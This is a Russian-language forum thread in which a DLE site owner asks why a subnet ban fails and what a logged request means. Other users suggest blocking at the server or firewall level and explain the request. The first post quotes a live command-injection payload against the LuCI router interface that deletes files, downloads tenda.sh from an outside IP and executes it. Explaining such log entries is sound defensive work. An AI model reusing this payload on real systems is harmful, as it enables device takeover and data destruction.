desart 4 Опубликовано: 28 февраля Рассказать Опубликовано: 28 февраля (изменено) Всем привет! Подскажите пжлста... почему данный ip или подсеть невозможно забанить? хоть в админке, хоть в .htaccess? *Подозреваю, что это вероятно из-за специфического запроса ниже: ip: 185.224.128.200 (185.224.128.0/24) GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.0 И что он вообще пытается сделать? (желательно простым языком, без премудростей о том, какие запросы к серверу бывают и, что они делают). *Нашел: "LuCI ‒ это веб-ориентированный интерфейс конфигурирования, написанный на языке программирования Lua. LuCI расшифровывается как Lua Configuration Interface." - но это безусловно мне ничего особо не говорит, кроме того, что хотят что-то записать(operation=write)... Да и о том ли я вообще?! ))) Скрытый текст сайт в разработке, лицуха + Изменено 28 февраля пользователем desart Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 986 Опубликовано: 29 февраля Рассказать Опубликовано: 29 февраля 9 часов назад, desart сказал: Подскажите пжлста... почему данный ip или подсеть невозможно забанить? хоть в админке, хоть в .htaccess? Как вы проверяете что нельзя? По логам сервера? Так если вы баните в DLE, то в логах сервера все также и будет присутствовать, потому что забанив в DLE, это не запрещает доступ к серверу, это запрещает доступ к DLE, а в логах все также будет присутствовать. Чтобы не видеть в логах, то и банить нужно на уровне файерволла сервера и блокировать доступ на уровне сервера. Цитата Ссылка на сообщение Поделиться на других сайтах
desart 4 Опубликовано: 29 февраля Рассказать Опубликовано: 29 февраля (изменено) Автор 12 часов назад, celsoft сказал: Как вы проверяете что нельзя? По логам сервера? Да, по логам... * Да, надо было указать, что хочу сделать 403 и не получается... Забиваю подсеть в .htaccess и по ней идёт 403(любые другие ip и подсети). А в данном случае идёт ошибка 404 - значит он попадает на стандартную страницу 404 - чего я и не могу понять... "Чтобы не видеть в логах..." - этого я не пытался сделать... я хотел 403 для него т.к. я его вставил и в админке 185.224.128.* и в .htaccess - Deny from 185.224.128.0/24 и по итогу 404... другими словами на сервере нет чего ему надо(запрос не выполняется), НО и 403 ошибки доступа не выдаёт... *Да и вообще интересно, что за запрос такой... Изменено 29 февраля пользователем desart Цитата Ссылка на сообщение Поделиться на других сайтах
igorek-art 28 Опубликовано: 1 марта Рассказать Опубликовано: 1 марта 10 часов назад, desart сказал: Да, по логам... * Да, надо было указать, что хочу сделать 403 и не получается... Забиваю подсеть в .htaccess и по ней идёт 403(любые другие ip и подсети). А в данном случае идёт ошибка 404 - значит он попадает на стандартную страницу 404 - чего я и не могу понять... "Чтобы не видеть в логах..." - этого я не пытался сделать... я хотел 403 для него т.к. я его вставил и в админке 185.224.128.* и в .htaccess - Deny from 185.224.128.0/24 и по итогу 404... другими словами на сервере нет чего ему надо(запрос не выполняется), НО и 403 ошибки доступа не выдаёт... *Да и вообще интересно, что за запрос такой... На сколько я помню и раньше интересовался банами по ip для сайта, хостер мне всегда писал что надо банить не в файлике папки домена, а где то в корне вашего хостинга есть тоже файлик .htaccess и именно в нем надо прописывать ip банов Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 986 Опубликовано: 1 марта Рассказать Опубликовано: 1 марта 10 часов назад, desart сказал: и в .htaccess - Deny from 185.224.128.0/24 и по итогу 404. Deny from далеко не на каждой версии Апача можно выполнить, плюс этот запрос может вообще идти не на Апач. Как правильно запретить доступ на сервер нужно узнавать в службе поддержки. 1 Цитата Ссылка на сообщение Поделиться на других сайтах
aleksandrhristich 106 Опубликовано: 1 марта Рассказать Опубликовано: 1 марта 29.02.2024 в 04:56, desart сказал: И что он вообще пытается сделать? Пытается загрузить исполняемый файл (в linux) tenda.sh, установить на него нужные ему права и запустить. А вот чтО конкретно запустить уже хз. 1 Цитата Ссылка на сообщение Поделиться на других сайтах
aleksandrhristich 106 Опубликовано: 1 марта Рассказать Опубликовано: 1 марта Возможно это атака, нацеленая на веб-интерфейс LuCI для маршрутизаторов. cgi-bin/luci/;stok=/locale: Это путь к CGI-скрипту в интерфейсе LuCI. LuCI - это веб-интерфейс для маршрутизаторов OpenWRT или аналогичных устройств. form=country&operation=write&country=: Это параметры, передаваемые CGI-скрипту. В итоге tenda.sh загружается в папку /tmp, удаляет все файлы,загружает какой-то сценарий оболочки с удаленного сервера и выполнить его. Ну вот както так. 1 Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.